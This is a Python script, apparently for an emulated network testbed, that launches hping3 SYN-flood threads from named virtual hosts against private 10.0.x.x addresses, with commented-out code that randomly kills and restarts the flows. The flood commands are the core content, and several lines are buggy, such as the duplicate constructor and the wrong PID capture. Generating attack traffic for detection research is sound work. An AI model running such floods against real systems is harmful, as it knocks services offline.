import os 
import threading
import time
import sys
import random

import psutil

from more_itertools import distinct_permutations




class Attack_flow(threading.Thread):
    host_id=""
    dst_ip=""
    pid=0


    def __init__(self):
        threading.Thread.__init__(self)

    def __init__(self,host_id,dst_ip):
        threading.Thread.__init__(self)
        self._stop_event = threading.Event()
        self.dst_ip=dst_ip
        self.host_id=host_id


    # def run(self):
    #     os.system("./host-cmd "+self.host_id+" hping3 -S -p ++ -i u10000 -d 2000 -V  "+self.dst_ip)


    # def run(self):
    #     os.system("./host-cmd "+self.host_id+" hping3 -S -p ++ -i u32000 -d 346 -V  "+self.dst_ip)  
    def run(self):
        os.system("./host-cmd "+self.host_id+" hping3 -S -p ++ -i u128000 -d 1546 -V  "+self.dst_ip)
        self.pid=os.getpid()
        print(self.pid)  
            
    def stop(self):
        self._stop_event.set()





def main():
    n=3
    attack_flow_arr=[]
    id_arr=[]
    last_id_arr=[]
    host_id_arr=["h01","h01","h11","h11","h12","h21","h21"]

    dst_ip_arr=["10.0.3.32","10.0.3.31","10.0.3.31","10.0.4.41","10.0.4.42","10.0.4.42","10.0.4.41"]

    # for i in range(len(host_id_arr)):
    #     attack_flow=Attack_flow(host_id_arr[i],dst_ip_arr[i])
    #     attack_flow_arr.append(attack_flow)
    


    
    for i in range(7):
        attack_flow=Attack_flow(host_id_arr[i],dst_ip_arr[i])
        attack_flow_arr.append(attack_flow)   



    id_arr=range(7)
    random.shuffle(id_arr)
    id_arr=id_arr[0:n]
    for i in range(7):
        attack_flow_arr[i].start()


    time.sleep(5)

    for i in range(7):
        print(attack_flow_arr[i].pid)




    # while(True):

        
    #     time.sleep(10)
    #     last_id_arr=id_arr
    #     id_arr=range(7)
    #     random.shuffle(id_arr)
    #     id_arr=id_arr[0:n]
        
    #     for id in range(7):
    #         if id in last_id_arr and id not in id_arr:
    #             print("killed id is "+str(id))
    #             os.system('kill -9 ' + str(attack_flow_arr[id].pid))
    #             attack_flow_arr[id]=Attack_flow(host_id_arr[id],dst_ip_arr[id])
    #         if id not in last_id_arr and id in id_arr:
    #             attack_flow_arr[id].start()
        
    #     time.sleep(10)

    #     print(last_id_arr)
    #     print(id_arr)

        
        

    # while(True):
    #     id_arr=[0,1,2,3,4,5,6]
    #     random.shuffle(id_arr)
    #     id_arr=id_arr[n]
        
    #     for id in id_arr:
    #         if id not in last_id_arr and id in id_arr:
    #             os.system('kill -9' + attack_flow_arr[id].pid)
                



    #     last_id_arr=id_arr



        









if __name__ == "__main__":
    main()



